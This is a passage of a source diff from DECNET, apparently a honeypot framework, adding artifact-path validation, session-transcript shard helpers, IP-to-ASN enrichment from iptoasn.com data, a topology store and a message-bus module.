        self._conn.execute(
            "INSERT INTO applied_topology"
            " (topology_id, applied_version_hash, hydrated_blob_json,"
            "  applied_at, last_error)"
            " VALUES (?, ?, ?, ?, NULL)"
            " ON CONFLICT(topology_id) DO UPDATE SET"
            "  applied_version_hash=excluded.applied_version_hash,"
            "  hydrated_blob_json=excluded.hydrated_blob_json,"
            "  applied_at=excluded.applied_at,"
            "  last_error=NULL",
            (
                topology_id,
                applied_version_hash,
                json.dumps(hydrated, sort_keys=True),
                int(time.time()),
            ),
        )
        self._conn.commit()
    def record_error(
        self,
        topology_id: str,
        message: str,
        hydrated: Optional[dict[str, Any]] = None,
    ) -> None:
        """Attach a last-error message for *topology_id*.
        Upserts a marker row when no apply has yet succeeded for this
        topology — that way a failure *during* the first materialise
        (put() hasn't been reached) still surfaces via GET
        /topology/state and the next heartbeat.  The marker row uses an
        empty ``applied_version_hash`` so master's heartbeat check sees
        the hash mismatch and schedules a resync.
        If *hydrated* is provided it is stored so a later teardown can
        still walk the LAN list — otherwise a partial deploy is strands
        containers + bridges with no breadcrumb back to them.
        """
        blob = json.dumps(hydrated, sort_keys=True) if hydrated else "{}"
        self._conn.execute(
            "INSERT INTO applied_topology"
            " (topology_id, applied_version_hash, hydrated_blob_json,"
            "  applied_at, last_error)"
            " VALUES (?, '', ?, 0, ?)"
            " ON CONFLICT(topology_id) DO UPDATE SET"
            "  last_error=excluded.last_error,"
            "  hydrated_blob_json=CASE"
            "   WHEN applied_topology.hydrated_blob_json='{}'"
            "   THEN excluded.hydrated_blob_json"
            "   ELSE applied_topology.hydrated_blob_json END",
            (topology_id, blob, message),
        )
        self._conn.commit()
    def clear(self, topology_id: str) -> None:
        """Remove the row for *topology_id* (post-teardown).
        No-op if the row doesn't exist — makes teardown idempotent.
        """
        self._conn.execute(
            "DELETE FROM applied_topology WHERE topology_id=?",
            (topology_id,),
        )
        self._conn.commit()
    def close(self) -> None:
        self._conn.close()
 # --------------------------------------------------- live docker observation
 def observed(docker_client: Any) -> dict[str, Any]:
    """Snapshot what docker is *actually* running on this agent.
    Returns a compact dict the heartbeat can ship so the master can
    cross-check ``applied_version_hash`` against reality (a matching
    hash with missing bridges is still drift).  Best-effort: if docker
    is unreachable we return an ``error`` marker rather than raising —
    the agent still needs to heartbeat, and the master can treat
    ``error`` as "unknown, re-push".
    """
    try:
        bridges = [
            n.name
            for n in docker_client.networks.list()
            if n.attrs.get("Driver") == "bridge"
            and n.name.startswith("decnet-topology-")
        ]
        containers = [
            c.name
            for c in docker_client.containers.list(all=False)
            if c.name.startswith("decnet-")
        ]
        return {"bridges": sorted(bridges), "containers": sorted(containers)}
    except Exception as exc:  # noqa: BLE001 — best-effort observation
        return {"error": str(exc)[:200]}
 __all__ = ["TopologyStore", "AppliedRow", "AlreadyApplied", "observed"]
--- a/decnet/archetypes.py
+++ b/decnet/archetypes.py
@@ -1,3 +1,4 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 Machine archetype profiles for DECNET deckies.
--- a/decnet/artifacts/init.py
+++ b/decnet/artifacts/init.py
@@ -0,0 +1 @@
 """Artifact storage helpers shared between the web router and TTP workers."""
--- a/decnet/artifacts/paths.py
+++ b/decnet/artifacts/paths.py
@@ -0,0 +1,86 @@
 """
 Shared on-disk artifact path resolution.
 Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
 quarantine tree:
    /var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
 Two callers need to translate ``(decky, stored_as, service)`` into a
 concrete ``Path`` rooted under that tree:
 * The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
  (``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
  download for the dashboard.
 * The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
  reads the stored ``.eml`` at tag-time so body-aware predicates
  (R0047 BEC, R0048 macro) don't need raw body text on the bus.
 Both callers share the same validation rules and the same
 defence-in-depth symlink-escape check; this module is the single
 implementation. It is auth-agnostic — wrappers layer authentication
 where appropriate (the router does ``require_admin``, the lifter does
 not).
 """
 from __future__ import annotations
 import os
 import re
 from pathlib import Path
 # decky names come from the deployer — lowercase alnum plus hyphens.
 _DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
 # Services that own an artifacts subdir. Kept explicit so a caller
 # can't pivot into arbitrary subpaths via a query string or bus payload.
 _ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
 # stored_as is assembled by the capturing template as:
 #   ${ts}_${sha:0:12}_${base}
 # where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
 # and base is the original filename's basename. Keep the filename charset
 # tight but allow common punctuation dropped files actually use.
 _STORED_AS_RE = re.compile(
    r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
 )
 # Module-level so tests can monkeypatch. Override via env in production
 # (the systemd unit sets this) — the prod path matches the bind mount
 # declared in decnet/services/{ssh,smtp}.py.
 ARTIFACTS_ROOT = Path(
    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
 )
 class ArtifactPathError(ValueError):
    """Raised when (decky, stored_as, service) fails validation or escapes
    the artifacts root.
    The router catches this and re-raises HTTPException(400). The lifter
    catches it and treats the event as having no body available (no-tag).
    """
 def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
    """Validate inputs, resolve the on-disk path, and confirm it stays
    inside the artifacts root.
    Raises :class:`ArtifactPathError` on any violation. Does NOT check
    that the file exists — callers handle that distinctly (404 for the
    router, no-tag for the lifter).
    """
    if service not in _ALLOWED_SERVICES:
        raise ArtifactPathError("invalid service")
    if not _DECKY_RE.fullmatch(decky):
        raise ArtifactPathError("invalid decky name")
    if not _STORED_AS_RE.fullmatch(stored_as):
        raise ArtifactPathError("invalid stored_as")
    root = ARTIFACTS_ROOT.resolve()
    candidate = (root / decky / service / stored_as).resolve()
    # defence-in-depth: even though the regexes reject `..`, make sure a
    # symlink or weird filesystem state can't escape the root.
    if root not in candidate.parents and candidate != root:
        raise ArtifactPathError("path escapes artifacts root")
    return candidate
--- a/decnet/artifacts/shards.py
+++ b/decnet/artifacts/shards.py
@@ -0,0 +1,129 @@
 """Shared asciinema shard helpers.
 Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
 so non-router callers (the BEHAVE-SHELL session-ended handler in
 ``decnet/profiler/worker.py``, the collector's session aggregator)
 can resolve shard paths without crossing the layer boundary into the
 FastAPI router.
 Functions here speak in :class:`ValueError` — callers that want HTTP
 semantics translate at the boundary. The router wrappers keep their
 existing ``HTTPException`` behaviour for backwards compatibility.
 PII boundary unchanged: shards live on disk; this module returns
 :class:`pathlib.Path` pointers, never byte content. The ``_get_index``
 cache stores byte offsets only.
 """
 from __future__ import annotations
 import os
 import re
 from collections import OrderedDict
 from pathlib import Path
 ARTIFACTS_ROOT = Path(
    os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
 )
 _DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
 _SERVICE_RE = re.compile(r"^(ssh|telnet)$")
 _SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
 _SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
 # (path, mtime_ns) → {sid: [(offset, length), ...]}
 _INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
    OrderedDict()
 )
 _CACHE_MAX = 32
 def validate_names(decky: str, service: str) -> None:
    """Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
    if not _DECKY_RE.fullmatch(decky):
        raise ValueError(f"invalid decky name: {decky!r}")
    if not _SERVICE_RE.fullmatch(service):
        raise ValueError(f"invalid service: {service!r}")
 def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
    """Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
    with escape-attempt detection. Raises :class:`ValueError` on
    invalid inputs.
    """
    validate_names(decky, service)
    if not _SHARD_BASENAME_RE.fullmatch(shard_name):
        raise ValueError(f"invalid shard name: {shard_name!r}")
    root = ARTIFACTS_ROOT.resolve()
    candidate = (root / decky / service / "transcripts" / shard_name).resolve()
    if root not in candidate.parents and candidate != root:
        raise ValueError(f"path escapes artifacts root: {candidate}")
    return candidate
 def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
    index: dict[str, list[tuple[int, int]]] = {}
    with path.open("rb") as f:
        offset = 0
        for line in f:
            length = len(line)
            m = _SID_LINE_RE.search(line)
            if m:
                sid = m.group(1).decode("ascii")
                index.setdefault(sid, []).append((offset, length))
            offset += length
    return index
 def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
    """Return ``(sid → [(offset, length), …], file_size)``.
    Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
    """
    st = path.stat()
    key = (str(path), st.st_mtime_ns)
    if key in _INDEX_CACHE:
        _INDEX_CACHE.move_to_end(key)
        return _INDEX_CACHE[key], st.st_size
    index = _build_index(path)
    _INDEX_CACHE[key] = index
    _INDEX_CACHE.move_to_end(key)
    while len(_INDEX_CACHE) > _CACHE_MAX:
        _INDEX_CACHE.popitem(last=False)
    return index, st.st_size
 def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
    """Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
    transcripts dir until one claims this ``sid``.
    Newest shards first — most lookups are for recent sessions. Caches
    the per-shard sid index, so repeated calls are ~free until the
    shard's mtime changes.
    Returns ``None`` when nothing claims the sid OR when the
    transcripts dir is missing / unreadable. Never raises on
    filesystem-level errors — callers treat ``None`` as "skip".
    """
    validate_names(decky, service)
    root = ARTIFACTS_ROOT.resolve()
    transcripts_dir = (root / decky / service / "transcripts").resolve()
    if root not in transcripts_dir.parents:
        return None
    try:
        if not transcripts_dir.is_dir():
            return None
        entries = list(transcripts_dir.iterdir())
    except (OSError, PermissionError):
        return None
    shards = sorted(
        (p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
        reverse=True,
    )
    for shard in shards:
        try:
            index, _size = get_index(shard)
        except (OSError, PermissionError):
            continue
        if sid in index:
            return shard
    return None
--- a/decnet/asn/init.py
+++ b/decnet/asn/init.py
@@ -0,0 +1,93 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 IP-to-ASN enrichment — maps attacker IPs to BGP-announced AS numbers and
 org names for attacker intelligence.
 Public surface mirrors :mod:`decnet.geoip` so callers can compose them:
 * :func:`get_lookup` — returns the singleton :class:`AsnLookup`.
 * :func:`enrich_ip` — takes an IP string, returns
  ``(asn_int, asn_name, bgp_prefix, provider_name)`` or ``(None, None, None, None)``.
 Provider selection goes through :func:`~decnet.asn.factory.get_provider`
 (env ``DECNET_ASN_PROVIDER``, default ``iptoasn``). Direct imports of
 concrete providers are forbidden — mirrors the ``get_bus`` /
 ``get_repository`` rule.
 """
 from __future__ import annotations
 import os
 import time
 from typing import Optional, Tuple
 from decnet.asn.factory import get_provider
 from decnet.asn.lookup import AsnLookup
 from decnet.asn.paths import ASN_ROOT
 # 24 h — iptoasn refreshes daily.
 REFRESH_INTERVAL_S = 86_400
 _lookup: Optional[AsnLookup] = None
 _provider_name: Optional[str] = None
 def get_lookup(*, force_refresh: bool = False) -> AsnLookup:
    """Return the cached :class:`AsnLookup`, building it on first use.
    If the provider's data files are missing or older than
    ``REFRESH_INTERVAL_S`` seconds, refresh before building. Pass
    ``force_refresh=True`` to bypass the age check (used by a future
    ``decnet asn refresh`` CLI command).
    """
    global _lookup, _provider_name
    provider = get_provider()
    _provider_name = provider.name
    if force_refresh or _files_stale(provider):
        provider.refresh()
        _lookup = None  # rebuild on next access
    if _lookup is None:
        _lookup = provider.build_lookup()
    return _lookup
 def enrich_ip(ip: str) -> Tuple[Optional[int], Optional[str], Optional[str], Optional[str]]:
    """Return ``(asn, as_name, bgp_prefix, provider_name)`` or ``(None, None, None, None)``.
    Never raises — any lookup failure collapses to all-None so the
    caller (profiler) can upsert the attacker row regardless.
    ``DECNET_ASN_ENABLED=false`` short-circuits the whole path, useful
    for tests / agent hosts / ops wanting to disable enrichment without
    touching provider config.
    """
    if os.environ.get("DECNET_ASN_ENABLED", "true").lower() == "false":
        return (None, None, None, None)
    try:
        lookup = get_lookup()
        info = lookup.asn(ip)
        if info is None:
            return (None, None, None, None)
        return (info.asn, info.name or None, info.prefix, _provider_name or "unknown")
    except Exception:
        return (None, None, None, None)
 def _files_stale(provider) -> bool:
    """True when the provider has no fresh data on disk.
    Same semantics as :func:`decnet.geoip._files_stale`: a partial
    cache still produces correct answers for the ranges it covers.
    """
    paths = provider.data_paths()
    if not paths:
        return True
    now = time.time()
    for p in paths:
        if p.exists() and now - p.stat().st_mtime <= REFRESH_INTERVAL_S:
            return False
    return True
 __all__ = ["get_lookup", "enrich_ip", "ASN_ROOT", "REFRESH_INTERVAL_S"]
--- a/decnet/asn/base.py
+++ b/decnet/asn/base.py
@@ -0,0 +1,34 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """ASN provider protocol — mirror of :mod:`decnet.geoip.base`.
 Concrete providers (e.g. :mod:`decnet.asn.iptoasn`) implement this.
 Callers must go through :func:`decnet.asn.factory.get_provider`; never
 import a concrete provider class directly.
 """
 from __future__ import annotations
 from abc import ABC, abstractmethod
 from pathlib import Path
 from typing import Sequence
 from decnet.asn.lookup import AsnLookup
 class Provider(ABC):
    """Abstract IP→ASN data provider."""
    #: Short tag written to ``Attacker.asn_source`` (e.g. ``'iptoasn'``).
    name: str
    @abstractmethod
    def refresh(self) -> None:
        """Download / regenerate the provider's raw data files."""
    @abstractmethod
    def build_lookup(self) -> AsnLookup:
        """Parse the on-disk data files and return a ready-to-query lookup."""
    @abstractmethod
    def data_paths(self) -> Sequence[Path]:
        """Return the list of files this provider manages — used for staleness
        detection. Order is not significant."""
--- a/decnet/asn/factory.py
+++ b/decnet/asn/factory.py
@@ -0,0 +1,40 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """ASN provider factory — mirror of :mod:`decnet.geoip.factory`.
 Dispatch key: ``DECNET_ASN_PROVIDER`` (default ``iptoasn``). Lazy
 singleton.
 """
 from __future__ import annotations
 import os
 from typing import Optional
 from decnet.asn.base import Provider
 _cached: Optional[Provider] = None
 _cached_key: Optional[str] = None
 def get_provider() -> Provider:
    """Return the configured :class:`Provider` singleton."""
    global _cached, _cached_key
    key = os.environ.get("DECNET_ASN_PROVIDER", "iptoasn").lower()
    if _cached is not None and _cached_key == key:
        return _cached
    if key == "iptoasn":
        from decnet.asn.iptoasn.provider import IptoasnProvider
        provider: Provider = IptoasnProvider()
    else:
        raise ValueError(f"Unsupported ASN provider: {key!r}")
    _cached = provider
    _cached_key = key
    return provider
 def reset_cache() -> None:
    """Forget the singleton — tests swap providers via the env var."""
    global _cached, _cached_key
    _cached = None
    _cached_key = None
--- a/decnet/asn/iptoasn/init.py
+++ b/decnet/asn/iptoasn/init.py
@@ -0,0 +1,10 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """iptoasn.com IP→ASN provider.
 Daily-refreshed gzipped TSV dump of the global BGP table, derived from
 RIPE RIS. Released into the public domain by upstream — no attribution
 required, no UA mandate, no terms to violate.
 Direct imports of :class:`IptoasnProvider` are discouraged — go through
 :func:`decnet.asn.factory.get_provider`.
 """
--- a/decnet/asn/iptoasn/fetch.py
+++ b/decnet/asn/iptoasn/fetch.py
@@ -0,0 +1,64 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """iptoasn.com bulk dump download.
 One file: ``ip2asn-v4.tsv.gz``, ~5 MB compressed, refreshed daily.
 Pulled over HTTPS with the same generic UA the geoip RIR fetcher uses
 (stealth: never identify as DECNET — public-data scrapers correlated to
 honeypot operator egress is the threat model).
 """
 from __future__ import annotations
 import logging
 import shutil
 import urllib.request
 from pathlib import Path
 from typing import Tuple
 logger = logging.getLogger("decnet.asn.iptoasn.fetch")
 # Mirror the (name, url) tuple shape of geoip.rir.fetch so test
 # harnesses can swap one for the other.
 IPTOASN_SOURCES: Tuple[Tuple[str, str], ...] = (
    ("ip2asn-v4", "https://iptoasn.com/data/ip2asn-v4.tsv.gz"),
 )
 # Generic UA — matches geoip.rir.fetch. iptoasn.com explicitly releases
 # the data into the public domain and does NOT require an identifying UA,
 # so we keep DECNET stealth instead of advertising.
 _USER_AGENT = "Mozilla/5.0 (compatible; fetch/1.0)"
 _TIMEOUT_S = 60
 def fetch_all(dest: Path) -> list[Path]:
    """Download every iptoasn file into *dest*. Returns the written paths.
    Atomic per file: download to ``{name}.tsv.gz.tmp`` then rename. A
    partial failure leaves the previous generation intact.
    """
    dest.mkdir(parents=True, exist_ok=True)
    written: list[Path] = []
    for name, url in IPTOASN_SOURCES:
        target = dest / f"{name}.tsv.gz"
        tmp = target.with_suffix(".gz.tmp")
        try:
            _download(url, tmp)
            tmp.replace(target)
            written.append(target)
            logger.info(
                "asn.iptoasn: fetched %s (%d bytes)",
                name, target.stat().st_size,
            )
        except Exception as exc:
            logger.error(
                "asn.iptoasn: fetch failed for %s (%s): %s", name, url, exc
            )
            if tmp.exists():
                tmp.unlink(missing_ok=True)
            # Keep any stale previous file — better outdated than empty.
    return written
 def _download(url: str, dest: Path) -> None:
    req = urllib.request.Request(url, headers={"User-Agent": _USER_AGENT})
    with urllib.request.urlopen(req, timeout=_TIMEOUT_S) as resp, dest.open("wb") as fh:  # nosec B310 — fixed https iptoasn URL
        shutil.copyfileobj(resp, fh)
--- a/decnet/asn/iptoasn/parse.py
+++ b/decnet/asn/iptoasn/parse.py
@@ -0,0 +1,79 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Parser for the iptoasn.com ``ip2asn-v4.tsv`` dump.
 Line shape (gzipped, one row per BGP-announced prefix)::
    1.0.0.0\\t1.0.0.255\\t13335\\tUS\\tCLOUDFLARENET
 Fields: ``range_start``, ``range_end``, ``as_number``, ``country_code``,
 ``as_description``. Both range columns are dotted IPv4 strings (the dump
 is IPv4-only — there's a separate ``ip2asn-v6.tsv.gz`` we don't pull).
 Rows skipped:
 * ``as_number == 0`` — iptoasn's sentinel for "unannounced" / private
  / reserved space. Country may still be present (``"None"`` / two-letter
  CC) but we don't care: the geoip module owns country, ASN owns BGP.
 * Rows where either range column won't parse as IPv4.
 * Rows with fewer than 3 tab-separated columns.
 """
 from __future__ import annotations
 import gzip
 import ipaddress
 import logging
 from pathlib import Path
 from typing import Iterator
 from decnet.asn.lookup import AsnInfo, Range
 logger = logging.getLogger("decnet.asn.iptoasn.parse")
 def parse_file(path: Path) -> Iterator[Range]:
    """Yield ``(start_int, end_int_inclusive, AsnInfo)`` for every BGP row.
    Accepts a gzipped path (``*.tsv.gz``); plain TSV is also fine for
    test harnesses that hand-craft small fixtures.
    """
    opener = gzip.open if path.suffix == ".gz" else open
    with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
        for lineno, raw in enumerate(fh, 1):
            line = raw.rstrip("\n")
            if not line:
                continue
            parts = line.split("\t")
            if len(parts) < 3:
                continue
            start_s, end_s, asn_s = parts[0], parts[1], parts[2]
            # Description is the 5th column; iptoasn quotes nothing,
            # but the field can contain stray whitespace. ``""`` when
            # missing or unknown.
            name = parts[4].strip() if len(parts) >= 5 else ""
            try:
                asn = int(asn_s)
            except ValueError:
                logger.debug(
                    "asn.iptoasn: skipping malformed asn line %d in %s",
                    lineno, path.name,
                )
                continue
            # ASN 0 is iptoasn's sentinel for unannounced / sentinel
            # space. Skip — there's no useful enrichment to attach.
            if asn == 0:
                continue
            try:
                start_int = int(ipaddress.IPv4Address(start_s))
                end_int = int(ipaddress.IPv4Address(end_s))
            except (ValueError, ipaddress.AddressValueError):
                logger.debug(
                    "asn.iptoasn: skipping malformed addr line %d in %s",
                    lineno, path.name,
                )
                continue
            if end_int < start_int:
                continue
            yield (start_int, end_int, AsnInfo(asn=asn, name=name))
--- a/decnet/asn/iptoasn/provider.py
+++ b/decnet/asn/iptoasn/provider.py
@@ -0,0 +1,84 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """iptoasn provider — orchestrates fetch + parse into an :class:`AsnLookup`.
 Mirrors :class:`decnet.geoip.rir.provider.RirProvider` exactly: fetch,
 build a pickled cache, invalidate when raw files are newer than the
 cache.
 """
 from __future__ import annotations
 import logging
 from pathlib import Path
 from typing import Sequence
 from decnet.asn.base import Provider
 from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
 from decnet.asn.iptoasn.parse import parse_file
 from decnet.asn.lookup import AsnLookup, Range
 from decnet.asn.paths import ensure_root
 logger = logging.getLogger("decnet.asn.iptoasn.provider")
 # Pickled lookup cache — skips re-parsing the ~580k-row gz dump on every
 # profiler restart. Rebuilt whenever any raw file is newer than the
 # cache, see ``_cache_fresh``.
 _CACHE_NAME = ".iptoasn_index.pkl"
 class IptoasnProvider(Provider):
    name = "iptoasn"
    def __init__(self) -> None:
        self._root = ensure_root()
    # ---------- Provider interface ----------
    def refresh(self) -> None:
        logger.info("asn.iptoasn: refreshing dump into %s", self._root)
        fetch_all(self._root)
        cache = self._root / _CACHE_NAME
        if cache.exists():
            cache.unlink(missing_ok=True)
    def build_lookup(self) -> AsnLookup:
        cache = self._root / _CACHE_NAME
        if self._cache_fresh(cache):
            try:
                lookup = AsnLookup.load(cache)
                logger.debug(
                    "asn.iptoasn: loaded cached index (%d ranges)",
                    len(lookup),
                )
                return lookup
            except Exception as exc:
                logger.warning(
                    "asn.iptoasn: cache load failed, rebuilding: %s", exc
                )
        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
            ranges.extend(parse_file(path))
        lookup = AsnLookup.from_ranges(ranges)
        try:
            lookup.save(cache)
        except Exception as exc:
            logger.warning("asn.iptoasn: cache save failed: %s", exc)
        logger.info("asn.iptoasn: built index with %d ranges", len(lookup))
        return lookup
    def data_paths(self) -> Sequence[Path]:
        return [self._root / f"{name}.tsv.gz" for name, _url in IPTOASN_SOURCES]
    # ---------- internals ----------
    def _cache_fresh(self, cache: Path) -> bool:
        """True when the pickle exists and is at least as new as every raw file."""
        if not cache.exists():
            return False
        cache_mtime = cache.stat().st_mtime
        for path in self.data_paths():
            if path.exists() and path.stat().st_mtime > cache_mtime:
                return False
        return True
--- a/decnet/asn/lookup.py
+++ b/decnet/asn/lookup.py
@@ -0,0 +1,143 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Provider-agnostic IP→ASN lookup.
 A :class:`AsnLookup` is a frozen, sorted array of ``(start_ip,
 end_ip_inclusive, AsnInfo)`` ranges queried via :mod:`bisect`.
 O(log n) on ~600k ranges (a current iptoasn dump is ~580k rows).
 Private/loopback/invalid IPv4 and all IPv6 addresses resolve to
 ``None`` — the same policy :mod:`decnet.geoip.lookup` uses.
 """
 from __future__ import annotations
 import bisect
 import ipaddress
 import pickle  # nosec B403 — self-produced cache under /var/lib/decnet, never deserialized from untrusted input
 from dataclasses import dataclass
 from pathlib import Path
 from typing import Iterable, List, Optional, Tuple
@dataclass(frozen=True)
 class AsnInfo:
    """One BGP-announced prefix's origin metadata."""
    asn: int
    name: str  # AS description / org name; "" if absent in the source data
    prefix: Optional[str] = None  # synthesized covering CIDR; set at lookup time, not at rest
 Range = Tuple[int, int, AsnInfo]
 def _synthesize_prefix(start_int: int, end_int: int, queried_int: int) -> Optional[str]:
    """Return the most-specific CIDR from [start, end] that contains queried_int."""
    try:
        for net in ipaddress.summarize_address_range(
            ipaddress.IPv4Address(start_int), ipaddress.IPv4Address(end_int)
        ):
            if queried_int >= int(net.network_address) and queried_int <= int(net.broadcast_address):
                return str(net)
    except (ValueError, TypeError):
        pass
    return None
@dataclass
 class AsnLookup:
    """Indexed AS lookup over IPv4 ranges."""
    # Parallel arrays for bisect: _starts[i] is the start-IP of the i-th
    # range, _ends[i] its inclusive end, _infos[i] its AsnInfo.
    _starts: List[int]
    _ends: List[int]
    _infos: List[AsnInfo]
    @classmethod
    def from_ranges(cls, ranges: Iterable[Range]) -> "AsnLookup":
        """Build a lookup from ``(start, end_inclusive, AsnInfo)`` triples.
        Ranges are sorted by start; on identical starts, last writer
        wins (matches :class:`decnet.geoip.lookup.Lookup` semantics).
        Non-overlapping adjacency is preserved.
        """
        sorted_ranges = sorted(ranges, key=lambda r: (r[0], r[1]))
        starts: List[int] = []
        ends: List[int] = []
        infos: List[AsnInfo] = []
        for start, end, info in sorted_ranges:
            if starts and starts[-1] == start:
                ends[-1] = end
                infos[-1] = info
                continue
            starts.append(start)
            ends.append(end)
            infos.append(info)
        return cls(starts, ends, infos)
    def asn(self, ip: str) -> Optional[AsnInfo]:
        """Return the :class:`AsnInfo` for ``ip`` or ``None``.
        ``None`` on: IPv6, private/loopback/link-local/multicast/reserved
        addresses, malformed strings, and IPs outside every BGP-announced
        range in the source dump.
        """
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            return None
        if isinstance(addr, ipaddress.IPv6Address):
            return None
        if (
            addr.is_private
            or addr.is_loopback
            or addr.is_link_local
            or addr.is_multicast
            or addr.is_reserved
            or addr.is_unspecified
        ):
            return None
        n = int(addr)
        idx = bisect.bisect_right(self._starts, n) - 1
        if idx < 0:
            return None
        if n <= self._ends[idx]:
            info = self._infos[idx]
            prefix = _synthesize_prefix(self._starts[idx], self._ends[idx], n)
            return AsnInfo(asn=info.asn, name=info.name, prefix=prefix)
        return None
    def __len__(self) -> int:
        return len(self._starts)
    # ---------- persistence ----------
    def save(self, path: Path) -> None:
        """Pickle the lookup to *path* (atomic rename)."""
        tmp = path.with_suffix(path.suffix + ".tmp")
        tmp.parent.mkdir(parents=True, exist_ok=True)
        with tmp.open("wb") as fh:
            pickle.dump(
                {
                    "version": 1,
                    "starts": self._starts,
                    "ends": self._ends,
                    "infos": [(i.asn, i.name) for i in self._infos],
                },
                fh,
                protocol=pickle.HIGHEST_PROTOCOL,
            )
        tmp.replace(path)
    @classmethod
    def load(cls, path: Path) -> "AsnLookup":
        """Load a pickled lookup from *path*."""
        with path.open("rb") as fh:
            data = pickle.load(fh)  # nosec B301 — self-produced file under /var/lib/decnet
        if data.get("version") != 1:
            raise ValueError(
                f"unsupported asn-lookup index version: {data.get('version')!r}"
            )
        infos = [AsnInfo(asn=a, name=n) for a, n in data["infos"]]
        return cls(data["starts"], data["ends"], infos)
--- a/decnet/asn/paths.py
+++ b/decnet/asn/paths.py
@@ -0,0 +1,19 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Filesystem layout for ASN data — mirror of :mod:`decnet.geoip.paths`.
 ``ASN_ROOT`` is where providers drop their raw files and cache indexes.
 Default ``/var/lib/decnet/asn``. Override with ``DECNET_ASN_ROOT`` for
 test harnesses.
 """
 from __future__ import annotations
 import os
 from pathlib import Path
 ASN_ROOT = Path(os.environ.get("DECNET_ASN_ROOT", "/var/lib/decnet/asn"))
 def ensure_root() -> Path:
    """Create ``ASN_ROOT`` if absent and return it. No-op if present."""
    ASN_ROOT.mkdir(parents=True, exist_ok=True)
    return ASN_ROOT
--- a/decnet/bus/init.py
+++ b/decnet/bus/init.py
@@ -0,0 +1,19 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DECNET ServiceBus — pub/sub notification substrate.
 The bus is the notification layer for DECNET's worker constellation.  The DB
 remains the source of truth for anything durable; the bus carries "something
 happened, go look" events.  Delivery is at-most-once, fire-and-forget.
 Consumers call :func:`get_bus` from :mod:`decnet.bus.factory`; never import
 transport implementations directly.  The factory selects the backend via
 ``DECNET_BUS_TYPE`` (``nats`` or ``fake``) and honors ``DECNET_BUS_ENABLED``.
 Topic hierarchy is defined in :mod:`decnet.bus.topics` and locked early so
 consumers can subscribe with stable wildcard patterns.
 """
 from __future__ import annotations
 from decnet.bus.base import BaseBus, Event, Subscription
 __all__ = ["BaseBus", "Event", "Subscription"]
--- a/decnet/bus/app.py
+++ b/decnet/bus/app.py
@@ -0,0 +1,93 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Process-wide bus singleton for request-serving workers (API, SSE routes).
 A single connected :class:`~decnet.bus.base.BaseBus` shared across request
 handlers — opening a UNIX socket per request would be wasteful and add
 latency to the hot path.  The API lifespan is responsible for calling
 :func:`close_app_bus` on shutdown; connect is lazy so tests and
 contract-test mode that never hit a publish/subscribe code path don't
 pay for a bus connection they'll never use.
 Failures during :meth:`BaseBus.connect` are swallowed and logged — a
 dead bus must never break request serving.  Publishers should treat a
 ``None`` return from :func:`get_app_bus` as "skip this notification",
 same as ``DECNET_BUS_ENABLED=false``.
 Connect is **retried with a short backoff** (not one-shot): a startup
 race where the API lifespan hits :func:`get_app_bus` before ``decnet
 bus`` is ready would otherwise poison the singleton for the entire
 process lifetime.  Instead we remember the last failure timestamp and
 let callers retry once ``_RETRY_BACKOFF`` seconds have passed.
 """
 from __future__ import annotations
 import asyncio
 import time
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
 from decnet.logging import get_logger
 log = get_logger("bus.app")
 # Publishers in the hot path shouldn't pay connect-retry latency on every
 # call; the dashboard's own 5 s poll interval recovers within one tick
 # once the bus comes up.  A persistently-dead bus only gets a connect
 # attempt every 2 s, not once per request.
 _RETRY_BACKOFF: float = 2.0
 _lock = asyncio.Lock()
 _shared: BaseBus | None = None
 _last_failure_ts: float = 0.0
 async def get_app_bus() -> BaseBus | None:
    """Return the process-wide connected bus, or ``None`` if unavailable.
    On first call, constructs a client via :func:`get_bus` and awaits
    ``connect()``.  Subsequent calls return the cached instance.  If a
    connect attempt raises, the failure timestamp is recorded and
